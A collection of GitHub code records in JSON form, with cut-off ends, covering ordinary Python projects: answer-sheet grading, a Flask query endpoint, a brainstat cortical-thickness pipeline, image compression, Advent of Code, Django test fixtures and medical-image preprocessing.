cv2.namedWindow(\"2\",cv2.WINDOW_NORMAL)\r\n    cv2.imshow(\"2\",dst)\r\n    cv2.waitKey(0)\r\n    cv2.destroyAllWindows()\"\"\"\r\n    for cnt in cnts:\r\n        area = cv2.contourArea(cnt)\r\n        if area>1000:\r\n            M = cv2.moments(cnt)\r\n            cx = int(M['m10'] / M['m00'])\r\n            cy = int(M['m01'] / M['m00'])\r\n            pnt1.append((cx, cy))\r\n    \r\n    ans=[\"A\",\"B\",\"C\",\"D\"]\r\n    for i in pnt1:\r\n        row=int((i[1]//n+1)/2)\r\n        col=(i[0]//n-1)\r\n        order=(row)*4+col//15+1\r\n        if order>m:\r\n            continue\r\n        s=(col%15-2)//3\r\n        if s<=3:\r\n            if order in pnt:\r\n                pnt[order]+=ans[s]\r\n            else:\r\n                pnt[order]=ans[s]\r\n        else:\r\n            pass\r\n    return(pnt)\r\n","repo_name":"18294090/school-admin","sub_path":"app/job/paper/judge.py","file_name":"judge.py","file_ext":"py","file_size_in_byte":6199,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"11423436403","text":"products = []\ncounter = 1\ncommand = ''\nwhile command != \"stop\":\n    name = input('Name: ')\n    price = input('Price: ')\n    amount = input('Amount: ')\n    units = input('Units: ')\n    products.append(\n        (counter, {\"Name\": name, \"Price\": price, \"Amount\": amount, \"Units\": units})\n    )\n    counter += 1\n    command = 
input(\"Write 'stop' for stop inputting: \")\n\nresult_list = {}\nfor numb, prod_dict in products:\n for key, value in prod_dict.items():\n if not result_list.get(key):\n result_list[key] = [value]\n else:\n result_list[key].append(value)\n\nfor key, value in result_list.items():\n result_list[key] = list(set(value))\n\nprint(result_list)\n\n\n\n","repo_name":"KLOTAS/Homework","sub_path":"Homework_2/Home6.py","file_name":"Home6.py","file_ext":"py","file_size_in_byte":689,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"27959245528","text":"class Solution:\n def numberOfSteps (self, num: int) -> int:\n\n step_count = 0\n for i in range(num):\n if num != 0:\n\n if num %2 == 0:\n print(f'{num} is even; divide by 2 and obtain {num/2}')\n num /= 2\n\n else:\n print(f'{num} is odd; subtract 1 and obtain {num - 1}')\n num -= 1\n\n step_count += 1\n\n else:\n break\n\n return step_count\n\n\nif __name__ == '__main__':\n\n n = 14\n instance = Solution()\n solution = instance.numberOfSteps(n)\n print(solution)\n","repo_name":"shivangdubey/HacktoberFest2020","sub_path":"LeetCode/Python/number_of_steps_to_reduce_a_number_to_zero.py","file_name":"number_of_steps_to_reduce_a_number_to_zero.py","file_ext":"py","file_size_in_byte":636,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"62"} +{"seq_id":"33571516362","text":"from flask import Blueprint, request, jsonify\nfrom database.db_utils import select\n\nselection = Blueprint('selection', __name__)\n\n@selection.route('/select/', methods=['GET'])\ndef select_data(table_name):\n params = request.json\n columns = params.get('columns', None) # Default to None if 'columns' key is not provided\n where_column = params.get('where_column', None)\n where_value = params.get('where_value', None)\n\n try:\n data = select(table_name, columns=columns, where_column=where_column, where_value=where_value)\n return jsonify({\"status\": \"success\", \"data\": data})\n except Exception as e:\n print({\"status\": \"error\", \"message\": str(e)})\n return jsonify({\"status\": \"error\", \"message\": \"Internal error\"})","repo_name":"sharp119/trymetrends","sub_path":"server/api/selection.py","file_name":"selection.py","file_ext":"py","file_size_in_byte":765,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"8934860838","text":"\nimport os\nfrom time import time\nimport warnings\nfrom os import PathLike\nimport numpy as np\nimport pandas as pd\nfrom pathlib import Path\nfrom string import Template\nfrom typing import Tuple, Dict\nimport matplotlib.pyplot as plt\nfrom nilearn.surface import Mesh, load_surf_mesh\nfrom brainstat.stats.terms import FixedEffect\nfrom brainstat.stats.SLM import SLM\nfrom scipy.stats import t\nfrom functools import reduce\n\nfrom numpy.testing import assert_array_almost_equal\n\nDEFAULT_FWHM = 20\nDEFAULT_THRESHOLD_UNCORRECTED_P_VALUE = 0.001\nDEFAULT_THRESHOLD_CORRECTED_P_VALUE = 0.05\nDEFAULT_CLUSTER_THRESHOLD = 0.001\nTSV_FIRST_COLUMN = \"participant_id\"\nTSV_SECOND_COLUMN = \"session_id\"\n\n\ndef _extract_parameters(parameters: Dict) -> Tuple[float, float, float, float]:\n fwhm = DEFAULT_FWHM\n if \"sizeoffwhm\" in parameters:\n fwhm = parameters[\"sizeoffwhm\"]\n threshold_uncorrected_pvalue = DEFAULT_THRESHOLD_UNCORRECTED_P_VALUE\n if \"thresholduncorrectedpvalue\" in parameters:\n threshold_uncorrected_pvalue = parameters[\"thresholduncorrectedpvalue\"]\n 
threshold_corrected_pvalue = DEFAULT_THRESHOLD_CORRECTED_P_VALUE\n if \"thresholdcorrectedpvalue\" in parameters:\n threshold_corrected_pvalue = parameters[\"thresholdcorrectedpvalue\"]\n cluster_threshold = DEFAULT_CLUSTER_THRESHOLD\n if \"clusterthreshold\" in parameters:\n cluster_threshold = parameters[\"clusterthreshold\"]\n return fwhm, threshold_uncorrected_pvalue, threshold_corrected_pvalue, cluster_threshold\n\n\ndef _read_and_check_tsv_file(tsv_file: PathLike) -> pd.DataFrame:\n if not tsv_file.exists():\n raise FileNotFoundError(f\"File {tsv_file} does not exist.\")\n tsv_data = pd.read_csv(tsv_file, sep=\"\\t\")\n if len(tsv_data.columns) < 2:\n raise ValueError(\n f\"The TSV data in {tsv_file} should have at least 2 columns.\"\n )\n if tsv_data.columns[0] != TSV_FIRST_COLUMN:\n raise ValueError(\n f\"The first column in {tsv_file} should always be {TSV_FIRST_COLUMN}.\"\n )\n if tsv_data.columns[1] != TSV_SECOND_COLUMN:\n raise ValueError(\n f\"The second column in {tsv_file} should always be {TSV_SECOND_COLUMN}.\"\n )\n return tsv_data\n\n\ndef _get_t1_freesurfer_custom_file_template(base_dir):\n return Template(\n str(base_dir) +\n \"/${subject}/${session}/t1/freesurfer_cross_sectional/${subject}_${session}/surf/${hemi}.thickness.fwhm${fwhm}.fsaverage.mgh\"\n )\n\n\ndef _build_thickness_array(\n input_dir: PathLike,\n surface_file: Template,\n df: pd.DataFrame,\n fwhm: float,\n) -> np.ndarray:\n from nibabel.freesurfer.mghformat import load\n thickness = []\n for idx, row in df.iterrows():\n subject = row[TSV_FIRST_COLUMN]\n session = row[TSV_SECOND_COLUMN]\n parts = (\n load(\n input_dir / surface_file.safe_substitute(\n subject=subject, session=session, fwhm=fwhm, hemi=hemi\n )\n ).get_fdata() for hemi in ['lh', 'rh']\n )\n combined = np.vstack(parts)\n thickness.append(combined.flatten())\n thickness = np.vstack(thickness)\n if thickness.shape[0] != len(df):\n raise ValueError(\n f\"Unexpected shape for thickness array : {thickness.shape}. \"\n f\"Expected {len(df)} rows.\"\n )\n return thickness\n\n\ndef _get_average_surface(fsaverage_path: PathLike) -> Tuple[dict, Mesh]:\n meshes = [\n load_surf_mesh(str(fsaverage_path / Path(f\"{hemi}.pial\")))\n for hemi in ['lh', 'rh']\n ]\n coordinates = np.vstack([mesh.coordinates for mesh in meshes])\n faces = np.vstack([\n meshes[0].faces,\n meshes[1].faces + meshes[0].coordinates.shape[0]\n ])\n average_mesh = Mesh(\n coordinates=coordinates,\n faces=faces,\n )\n ##################\n ## UGLY HACK !!! 
Need investigation\n ##################\n # Uncomment the following line if getting an error\n # with negative values in bincount in Brainstat.\n # Not sure, but might be a bug in BrainStat...\n #\n #faces += 1\n #################\n average_surface = {\n \"coord\": coordinates,\n \"tri\": faces,\n }\n return average_surface, average_mesh\n\n\ndef _check_contrast(\n contrast: str,\n df: pd.DataFrame,\n glm_type: str,\n) -> Tuple[str, str, bool]:\n absolute_contrast = contrast\n with_interaction = False\n contrast_sign = \"positive\"\n if contrast.startswith(\"-\"):\n absolute_contrast = contrast[1:].lstrip()\n contrast_sign = \"negative\"\n if \"*\" in contrast:\n with_interaction = True\n warnings.warn(\n \"You included interaction as covariate in your model, \"\n \"please carefully check the format of your tsv files.\"\n )\n else:\n if absolute_contrast not in df.columns:\n raise ValueError(\n f\"Column {absolute_contrast} does not exist in provided TSV file.\"\n )\n if glm_type == \"group_comparison\":\n unique_labels = np.unique(df[absolute_contrast])\n if len(unique_labels) != 2:\n raise ValueError(\n \"For group comparison, there should be just 2 different groups!\"\n )\n return absolute_contrast, contrast_sign, with_interaction\n\n\ndef _print_clusters(model, threshold: float):\n \"\"\"Print results related to total number of clusters\n and significative clusters.\n \"\"\"\n print(\"#\" * 40)\n print(\"After correction (Clusterwise Correction for Multiple Comparisons): \")\n df = model.P['clus'][1]\n print(df)\n print(f\"Clusters found: {len(df)}\")\n print(f\"Significative clusters (after correction): {len(df[df['P'] <= threshold])}\")\n\n\ndef _plot_stat_map(mesh, texture, filename, threshold=None, title=None, verbose=True):\n from nilearn.plotting import plot_surf_stat_map\n plot_filename = filename + \".png\"\n if verbose:\n print(f\"--> Saving plot to {plot_filename}\")\n plot_surf_stat_map(\n mesh, texture, threshold=threshold, output_file=plot_filename, title=title,\n )\n\n\ndef _plot_results(results: dict, filename_root: PathLike, mesh, verbose=True):\n for name, result in results.items():\n if name != \"coefficients\":\n if isinstance(result, dict):\n texture = result['P']\n else:\n texture = result\n _plot_stat_map(\n mesh,\n texture,\n str(filename_root) + name,\n threshold=None,\n title=name,\n verbose=verbose,\n )\n\n\ndef _save_to_mat(struct, filename, key, verbose=True):\n from scipy.io import savemat\n mat_filename = filename + \".mat\"\n if verbose:\n print(f\"--> Saving matrix to {mat_filename}\")\n savemat(mat_filename, {key: struct})\n\n\ndef _build_model(design_matrix: str, df: pd.DataFrame):\n \"\"\"Build a brainstat model from the design matrix in\n string format.\n This function assumes that the design matrix is formatted\n in the following way:\n\n 1 + factor_1 + factor_2 + ...\n\n Or:\n\n factor_1 + factor_2 + ... 
(in this case the intercept will\n be added automatically).\n \"\"\"\n if len(design_matrix) == 0:\n raise ValueError(\"Design matrix cannot be empty.\")\n if \"+\" in design_matrix:\n terms = [_.strip() for _ in design_matrix.split(\"+\")]\n else:\n terms = [design_matrix.strip()]\n model = []\n for term in terms:\n # Intercept is automatically included in brainstat\n if term == \"1\":\n continue\n # Handles the interaction effects\n if \"*\" in term:\n sub_terms = [_.strip() for _ in term.split(\"*\")]\n model_term = reduce(\n lambda x, y: x * y,\n [_build_model_term(_, df) for _ in sub_terms]\n )\n else:\n model_term = _build_model_term(term, df)\n model.append(model_term)\n if len(model) == 1:\n return model[0]\n return reduce(lambda x, y: x + y, model)\n\n\nMISSING_TERM_ERROR_MSG = Template(\n \"Term ${term} from the design matrix is not in the columns of the \"\n \"provided TSV file. Please make sure that there is no typo.\"\n)\n\n\ndef _build_model_term(term: str, df: pd.DataFrame) -> FixedEffect:\n if term not in df.columns:\n raise ValueError(MISSING_TERM_ERROR_MSG.safe_substitute(term=term))\n return FixedEffect(df[term])\n\n\ndef _is_categorical(df: pd.DataFrame, column: str) -> bool:\n if column not in df.columns:\n raise ValueError(MISSING_TERM_ERROR_MSG.safe_substitute(term=column))\n return not df[column].dtype.name.startswith(\"float\")\n\n\ndef _get_contrasts_and_filenames(\n glm_type: str,\n contrast: str,\n df: pd.DataFrame,\n):\n (\n abs_contrast,\n contrast_sign,\n with_interaction\n ) = _check_contrast(\n contrast, df, glm_type\n )\n if glm_type == \"group_comparison\":\n if not with_interaction:\n return _get_group_contrast_without_interaction(abs_contrast, df)\n else:\n return _get_group_contrast_with_interaction(abs_contrast, df)\n elif glm_type == \"correlation\":\n return _get_correlation_contrast(abs_contrast, df, contrast_sign)\n else:\n raise ValueError(\n \"Check out if you define the glmtype flag correctly, \"\n \"or define your own general linear model, e,g MGLM.\"\n )\n\n\ndef _get_group_contrast_with_interaction(\n contrast: str,\n df: pd.DataFrame,\n):\n \"\"\"Build contrasts and filename roots for group GLMs with interaction.\"\"\"\n contrasts = dict()\n filenames = dict()\n contrast_elements = [_.strip() for _ in contrast.split(\"*\")]\n categorical = [_is_categorical(df, _) for _ in contrast_elements]\n if len(contrast_elements) != 2 or sum(categorical) != 1:\n raise ValueError(\n \"The contrast must be an interaction between one continuous \"\n \"variable and one categorical variable. 
Your contrast contains \"\n f\"the following variables : {contrast_elements}\"\n )\n idx = 0 if categorical[0] else 1\n categorical_contrast = contrast_elements[idx]\n continue_contrast = contrast_elements[(idx + 1) % 2]\n group_values = np.unique(df[categorical_contrast])\n built_contrast = df[continue_contrast] * (\n (df[categorical_contrast] == group_values[0]).astype(int)\n ) - df[continue_contrast] * (\n (df[categorical_contrast] == group_values[1]).astype(int)\n )\n contrasts[contrast] = built_contrast\n filenames[contrast] = (\n Template(\"interaction-${contrast_name}_measure-${feature_label}_fwhm-${fwhm}\")\n )\n return contrasts, filenames\n\n\ndef _get_group_contrast_without_interaction(\n contrast: str,\n df: pd.DataFrame,\n):\n \"\"\"Build contrasts and filename roots for group GLMs without interaction.\"\"\"\n contrasts = dict()\n filenames = dict()\n if not _is_categorical(df, contrast):\n raise ValueError(\n \"Contrast should refer to a categorical variable for group comparison. \"\n \"Please select 'correlation' for 'glm_type' otherwise.\"\n )\n group_values = np.unique(df[contrast])\n for contrast_type, (i, j) in zip([\"positive\", \"negative\"], [(0, 1), (1, 0)]):\n contrast_name = f\"{group_values[i]}-lt-{group_values[j]}\"\n contrasts[contrast_name] = (\n (df[contrast] == group_values[i]).astype(int) -\n (df[contrast] == group_values[j]).astype(int)\n )\n filenames[contrast_name] = (\n Template(\"group-${group_label}_${contrast_name}_measure-${feature_label}_fwhm-${fwhm}\")\n )\n return contrasts, filenames\n\n\ndef _get_correlation_contrast(\n contrast: str,\n df: pd.DataFrame,\n contrast_sign: str,\n):\n \"\"\"Build contrasts and filename roots for correlation GLMs.\"\"\"\n contrasts = dict()\n filenames = dict()\n built_contrast = df[contrast]\n if contrast_sign == \"negative\":\n built_contrast *= -1\n contrasts[contrast] = built_contrast\n filenames[contrast] = Template(\n \"group-${group_label}_correlation-${contrast_name}-\"\n f\"{contrast_sign}_\"\n \"measure-${feature_label}_fwhm-${fwhm}\"\n )\n return contrasts, filenames\n\n\ndef _compute_results(\n model,\n mask,\n threshold_uncorrected_pvalue,\n threshold_corrected_pvalue\n):\n results = dict()\n results[\"coefficients\"] = np.nan_to_num(model.coef)\n results[\"TStatistics\"] = np.nan_to_num(model.t)\n results[\"uncorrectedPValue\"] = dict()\n results[\"uncorrectedPValue\"][\"P\"] = 1 - t.cdf(results[\"TStatistics\"], model.df)\n results[\"uncorrectedPValue\"][\"mask\"] = mask\n results[\"uncorrectedPValue\"][\"thresh\"] = threshold_uncorrected_pvalue\n results[\"FDR\"] = model._fdr()\n results[\"correctedPValue\"] = dict()\n results[\"correctedPValue\"][\"P\"] = model.P[\"pval\"][\"P\"]\n results[\"correctedPValue\"][\"C\"] = model.P[\"pval\"][\"C\"]\n results[\"correctedPValue\"][\"mask\"] = mask\n results[\"correctedPValue\"][\"thresh\"] = threshold_corrected_pvalue\n return results\n\n\ndef _save_results_to_json(results: dict, filename_root: PathLike, verbose=True):\n import json\n out_json_file = str(filename_root) + \"_results.json\"\n if verbose:\n print(f\"--> Writing results to JSON in {out_json_file}...\")\n jsonable = dict()\n for k, v in results.items():\n if isinstance(v, np.ndarray):\n jsonable[k] = v.tolist()\n elif isinstance(v, dict):\n jsonable[k] = dict()\n for kk, vv in v.items():\n if isinstance(vv, np.ndarray):\n jsonable[k][kk] = vv.tolist()\n else:\n jsonable[k][kk] = vv\n else:\n jsonable[k] = v\n with open(out_json_file, \"w\") as fp:\n json.dump(jsonable, fp, indent=4)\n\n\ndef 
_save_results_to_mat(results: dict, filename_root: PathLike, verbose=True):\n # These labels are used for compatibility with the previous\n # MATLAB implementation of the Statistics Surface Pipeline\n # of Clinica.\n if verbose:\n print(\"--> Writing results to mat files...\")\n STRUCT_LABELS = {\n \"coefficients\": \"coef\",\n \"TStatistics\": \"tvaluewithmask\",\n \"uncorrectedPValue\": \"uncorrectedpvaluesstruct\",\n \"correctedPValue\": \"correctedpvaluesstruct\",\n \"FDR\": \"FDR\",\n }\n for name, result in results.items():\n _save_to_mat(\n result,\n str(filename_root) + \"_\" + name,\n STRUCT_LABELS[name],\n verbose=verbose,\n )\n\n\ndef _save_results_to_bids(results: dict, filename_root: PathLike, verbose=True):\n warnings.warn(\"Writing results to BIDS is not implemented yet.\")\n\n\nWRITERS = {\n \"json\": _save_results_to_json,\n \"mat\": _save_results_to_mat,\n \"bids\": _save_results_to_bids,\n}\n\n\ndef _save_results(results: dict, filename_root: PathLike, out_formats=\"all\", verbose=True):\n if out_formats == \"all\":\n out_formats = list(WRITERS.keys())\n for output_format in out_formats:\n if output_format not in WRITERS:\n warnings.warn(\n f\"Could not write to {output_format} because \"\n \"writer doesn't exist.\"\n )\n WRITERS[output_format](results, filename_root, verbose=verbose)\n\n\ndef clinica_surfstat(\n input_dir: PathLike,\n output_dir: PathLike,\n tsv_file: PathLike,\n design_matrix: str,\n contrast: str,\n glm_type: str,\n group_label: str,\n freesurfer_home: PathLike,\n surface_file: PathLike,\n feature_label: str,\n parameters: dict,\n verbose=True,\n):\n \"\"\"This function mimics the previous function `clinica_surfstat`\n written in MATLAB and relying on the MATLAB package SurfStat.\n This implementation is written in pure Python and rely on the\n package brainstat for GLM modeling.\n\n Parameters\n ----------\n input_dir : PathLike\n Input folder.\n\n output_dir : PathLike\n Output folder for storing results.\n\n tsv_file : PathLike\n Path to the TSV file `subjects.tsv` which contains the\n necessary metadata to run the statistical analysis.\n\n .. warning::\n The column names need to be accurate because they\n are used to defined contrast and model terms.\n Please double check for typos.\n\n design_matrix : str\n Design matrix in string format. For example \"1+Label\"\n\n contrast : str\n The contrast to be used in the GLM.\n\n .. 
warning::\n The contrast needs to be in the design matrix.\n\n glm_type : {\"group_comparison\", \"correlation\"}\n Type of GLM to run:\n - \"group_comparison\": Performs group comparison.\n For example \"AD - ND\".\n - \"correlation\": Performs correlation analysis.\n\n group_label : str\n\n freesurfer_home : PathLike\n Path to the home folder of Freesurfer.\n This is required to get the fsaverage templates.\n\n surface_file : PathLike\n \"\"\"\n (\n fwhm, threshold_uncorrected_pvalue,\n threshold_corrected_pvalue, cluster_threshold,\n ) = _extract_parameters(parameters)\n fsaverage_path = (freesurfer_home / Path(\"subjects/fsaverage/surf\"))\n if verbose:\n print(f\"--> fsaverage path : {fsaverage_path}\")\n df_subjects = _read_and_check_tsv_file(tsv_file)\n thickness = _build_thickness_array(\n input_dir, surface_file, df_subjects, fwhm\n )\n mask = thickness[0, :] > 0\n average_surface, average_mesh = _get_average_surface(fsaverage_path)\n if verbose:\n print(f\"--> The GLM linear model is: {design_matrix}\")\n print(f\"--> The GLM type is: {glm_type}\")\n contrasts, filenames = _get_contrasts_and_filenames(\n glm_type, contrast, df_subjects\n )\n naming_parameters = {\n \"fwhm\": fwhm,\n \"group_label\": group_label,\n \"feature_label\": feature_label,\n }\n model = _build_model(design_matrix, df_subjects)\n for contrast_name, model_contrast in contrasts.items():\n filename_root = output_dir / filenames[contrast_name].safe_substitute(\n contrast_name=contrast_name, **naming_parameters\n )\n slm_model = SLM(\n model,\n contrast=model_contrast,\n surf=average_surface,\n mask=mask,\n two_tailed=True,\n correction=[\"fdr\", \"rft\"],\n cluster_threshold=cluster_threshold,\n )\n if verbose:\n print(f\"--> Fitting the SLM model with contrast {contrast_name}...\")\n slm_model.fit(thickness)\n results = _compute_results(\n slm_model, mask, threshold_uncorrected_pvalue, threshold_corrected_pvalue\n )\n _save_results(\n results, filename_root, out_formats=\"all\", verbose=verbose\n )\n _plot_results(\n results, filename_root, average_mesh, verbose=verbose\n )\n _print_clusters(\n slm_model, threshold_corrected_pvalue\n )\n\n # beta_hat = np.linalg.pinv(model.matrix.values.T @ model.matrix.values) @ model.matrix.values.T @ thickness\n # assert_array_almost_equal(beta_hat, np.nan_to_num(slm_model.coef))\n\nif __name__ == \"__main__\":\n current_dir = Path(\n os.path.dirname(os.path.realpath(__file__))\n )\n caps_dir = Path(\n #\"/network/lustre/iss02/aramis/project/clinica/data_ci/StatisticsSurface\"\n \"/Users/nicolas.gensollen/GitRepos/clinica_data_ci/data_ci/StatisticsSurface\"\n )\n input_dir = caps_dir / Path(\"in/caps/subjects\")\n output_dir = Path(\"./out\")\n tsv_file = caps_dir / Path(\"in/subjects.tsv\")\n design_matrix = \"1 + age + sex + age * sex\"\n #design_matrix = \"1 + group + age + sex\"\n #design_matrix = \"1 + sex\"\n #contrast = \"group\"\n #contrast = \"sex\"\n contrast = \"age * sex\"\n glm_type = \"group_comparison\"\n #glm_type = \"correlation\"\n group_label = \"UnitTest\"\n freesurfer_home = Path(\"/Applications/freesurfer/7.2.0/\")\n print(f\"FreeSurfer home : {freesurfer_home}\")\n surface_file = _get_t1_freesurfer_custom_file_template(input_dir)\n print(f\"Surface file : {surface_file}\")\n feature_label = \"ct\"\n parameters = dict()\n clinica_surfstat(\n input_dir,\n output_dir,\n tsv_file,\n design_matrix,\n contrast,\n glm_type,\n group_label,\n freesurfer_home,\n surface_file,\n feature_label,\n parameters,\n verbose=True,\n 
)\n\n","repo_name":"NicolasGensollen/POC_Stat_Pipeline","sub_path":"legacy/clinica_surfstat.py","file_name":"clinica_surfstat.py","file_ext":"py","file_size_in_byte":20526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"35734660938","text":"from PIL import Image\nimport os\n\ndef compress_image(input_path, output_path, quality=50):\n \"\"\"\n Nén ảnh với chất lượng cụ thể.\n\n Args:\n input_path (str): Đường dẫn đến ảnh gốc.\n output_path (str): Đường dẫn đến ảnh sau khi nén.\n quality (int): Chất lượng nén (0 - 100), giá trị càng thấp càng nén mạnh.\n\n Returns:\n None\n \"\"\"\n try:\n image = Image.open(input_path)\n image.save(output_path, optimize=True, quality=quality)\n # print(f\"Đã nén ảnh thành công: {output_path}\")\n except Exception as e:\n print(input_path)\n print(f\"Lỗi: {str(e)}\")\n\n\n\nimport os\nimport multiprocessing\nimport tqdm\nimport glob\n\ndef process_folder(folder_path):\n os.mkdir(folder_path.replace('Keyframe', 'Keyframe_Compress'))\n for img_path in tqdm.tqdm(glob.glob(os.path.join(folder_path, '*'))):\n output_image_path = img_path.replace('Keyframe', 'Keyframe_Compress')\n compress_image(img_path, output_image_path, quality=50)\n\ndef process_all_folders(root_folder):\n folders = [os.path.join(root_folder, folder_name) for folder_name in os.listdir(root_folder) if os.path.isdir(os.path.join(root_folder, folder_name))]\n\n # Create a pool of worker processes\n pool = multiprocessing.Pool(processes=multiprocessing.cpu_count())\n\n # Process each folder concurrently\n pool.map(process_folder, folders)\n\nif __name__ == \"__main__\":\n root_directory = \"/mmlabworkspace/Students/AIC/MMLAB-UIT-AIC2023/data/Merge/Keyframe\"\n\n process_all_folders(root_directory)\n\n # print('original',len(glob.glob(\"/mmlabworkspace/Students/AIC/MMLAB-UIT-AIC2023/data/Merge/Keyframe/*/*.jpg\")))\n # print('after',len(glob.glob(\"/mmlabworkspace/Students/AIC/MMLAB-UIT-AIC2023/data/Merge/Keyframe_Compress/*/*.jpg\")))\n\n","repo_name":"hungcao0402/Retrieval-Event-In-Video","sub_path":"data_preparation/compress_img.py","file_name":"compress_img.py","file_ext":"py","file_size_in_byte":1849,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"62"} +{"seq_id":"15048415770","text":"from django.contrib.auth.models import User\nfrom django.test import TestCase\n\nfrom apps.recipes import models\n\n\nclass RecipeMixin:\n def _make_category(self, name='Categoria'):\n return models.recipe_category.objects.create(name=name)\n\n def _make_user(\n self,\n username='User',\n password='123456',\n email='user@email.com',\n first_name='user',\n last_name='name',\n ):\n return User.objects.create_user(\n username=username,\n password=password,\n email=email,\n first_name=first_name,\n last_name=last_name,\n )\n\n # Usable\n def make_recipe(\n self,\n title='Test',\n description='test',\n slug='slug-test',\n preparation_time=2,\n preparation_time_unit='Minutos',\n servings=12,\n servings_unit='Pessoas',\n preparation_steps='test',\n preparation_steps_is_html=False,\n created_at='',\n updated_at='',\n is_published=True,\n category={},\n author={},\n cover='image/test/path',\n ):\n return models.Recipe.objects.create(\n title=title,\n description=description,\n slug=slug,\n preparation_time=preparation_time,\n preparation_time_unit=preparation_time_unit,\n servings=servings,\n servings_unit=servings_unit,\n preparation_steps=preparation_steps,\n 
preparation_steps_is_html=preparation_steps_is_html,\n created_at=created_at,\n updated_at=updated_at,\n is_published=is_published,\n category=self._make_category(**category),\n author=self._make_user(**author),\n cover=cover,\n )\n\n \n def make_recipe_default(\n self,\n title='Test', \n description= 'test',\n slug = 'slug-test',\n preparation_time = 2,\n preparation_time_unit = 'Minutos',\n servings = 12,\n servings_unit = 'Pessoas',\n preparation_steps = 'test',\n created_at = '',\n updated_at = '',\n category = {},\n author = {},\n cover = 'image/test/path',\n ):\n return models.Recipe.objects.create(\n title=title, \n description= description,\n slug = slug,\n preparation_time = preparation_time,\n preparation_time_unit = preparation_time_unit,\n servings = servings,\n servings_unit = servings_unit,\n preparation_steps = preparation_steps,\n created_at = created_at,\n updated_at = updated_at,\n category = self._make_category(**category),\n author = self._make_user(**author),\n cover = cover,\n )\n \n def make_recipes(self, len=12):\n recipes = []\n for c in range(len):\n kwargs = {\n 'title': f'Test-{c}',\n 'slug': f'slug-{c}', \n 'author': {'username': f'user_{c}'}, \n 'cover': ''}\n recipe = self.make_recipe(**kwargs)\n recipes.append(recipe)\n return recipes\n\nclass TestBase(TestCase, RecipeMixin):\n # Test Fixtures\n ...","repo_name":"Rafael-Rueda/recipes-website","sub_path":"apps/recipes/tests/fixtures/recipes_base_tests.py","file_name":"recipes_base_tests.py","file_ext":"py","file_size_in_byte":3230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"691377357","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\"day02.py: Advent of Code 2019 --- Day 2: 1202 Program Alarm ---\n https://adventofcode.com/2019/day/2\n\"\"\"\n\n__version__ = \"1.0\"\n__maintainer__ = \"Jiří Řepík\"\n__email__ = \"jiri.repik@gmail.com\"\n__status__ = \"Submited\"\n\nimport advent\nfrom utils import *\nfrom operator import add, mul\nfrom itertools import product\n\n\ndef run(prog, *inputs):\n prog[1:3] = inputs[:]\n pc = 0\n\n while prog[pc] != 99:\n op = add if prog[pc] == 1 else mul\n a, b, c = prog[pc + 1:pc + 4]\n prog[c] = op(prog[a], prog[b])\n pc += 4\n\n return prog[0]\n\ndef download_input_data():\n global fin\n advent.setup(2019, 2, dry_run=False)\n fin = advent.get_input()\n timer_start()\n\ndef part01():\n global fin \n global nums\n global total\n global program\n program = list(map(int, fin.read().split(',')))\n result = run(program[:], 12, 2)\n assert result == 12490719\n advent.submit_answer(1, result)\n\ndef part02():\n for noun, verb in product(range(100), range(100)):\n if run(program[:], noun, verb) == 19690720:\n break\n answer = 100 * noun + verb\n assert answer == 2003\n advent.submit_answer(2, answer)\n\nif __name__ == \"__main__\":\n download_input_data()\n timer_start()\n part01()\n part02()\n","repo_name":"repji01/advent-of-code-2019","sub_path":"day02.py","file_name":"day02.py","file_ext":"py","file_size_in_byte":1312,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"62"} +{"seq_id":"27985475715","text":"\"\"\"\nsubsample slices and shift the short axis and long axis slices\n\"\"\"\nimport cv2\nimport numpy as np\nimport random\nfrom scipy import ndimage\nfrom scipy.ndimage.interpolation import shift\n\n\nclass ExpDtToSeg:\n \"\"\"\n Select Short axis image and convert the distance transform to binary mask.\n \"\"\"\n\n def __init__(self, sa_slices_num=13, 
hist_clamp=False, include_lachannel=0):\n self.sa_slices_num = sa_slices_num\n self.hist_clamp_enable = hist_clamp\n self.include_lachannel = include_lachannel\n\n def __call__(self, sample):\n # Here we just use mask instead of image as input.\n # Be careful if you use this script otherwise!\n image, mask, misc = sample['image'],sample['mask'], sample['misc']\n\n if self.include_lachannel > 0:\n sax_image = image\n laxch = image.shape[0] -1\n if laxch >= self.include_lachannel:\n lax_list = list(range(1, laxch+1))\n lax_indexes = [0] + sorted(random.sample(lax_list, k=self.include_lachannel))\n mask = mask[lax_indexes]\n sax_image = sax_image[lax_indexes]\n else:\n mask = np.pad(mask, ((0, self.include_lachannel - laxch), (0, 0), (0, 0), (0, 0)))\n sax_image = np.pad(image, ((0, self.include_lachannel - laxch), (0, 0), (0, 0), (0, 0)))\n\n else:\n sax_image = image[0:1]\n # Select Short Axis slices\n sax_mask = mask[0:1]\n laxch, sax_num, x, y = sax_mask.shape\n if sax_num < self.sa_slices_num:\n sax_mask = np.pad(sax_mask, ((0, 0), (0, self.sa_slices_num - sax_num), (0, 0), (0, 0)))\n sax_image = np.pad(sax_image, ((0, 0), (0, self.sa_slices_num - sax_num), (0, 0), (0, 0)))\n elif sax_num > self.sa_slices_num:\n start_idx = np.random.randint(0, sax_num - self.sa_slices_num)\n sax_mask = sax_mask[:, start_idx:(start_idx + self.sa_slices_num)]\n sax_image = sax_image[:, start_idx:(start_idx + self.sa_slices_num)]\n\n sax_new_mask = np.zeros_like(sax_mask)\n sax_new_mask[sax_mask<0.5] = 1\n\n if self.hist_clamp_enable:\n sax_image = self.hist_clamp(sax_image)\n\n return {'image': sax_image.astype(\"float\"), 'mask': sax_new_mask, 'misc': misc}\n\n def hist_clamp(self, image):\n new_image = []\n bd_up = 99.9\n bd_low = 0.1\n for i in range(image.shape[0]):\n sub_img = image[i]\n sub_img[sub_img > np.percentile(sub_img, bd_up)] = np.percentile(sub_img, bd_up)\n sub_img[sub_img < np.percentile(sub_img, 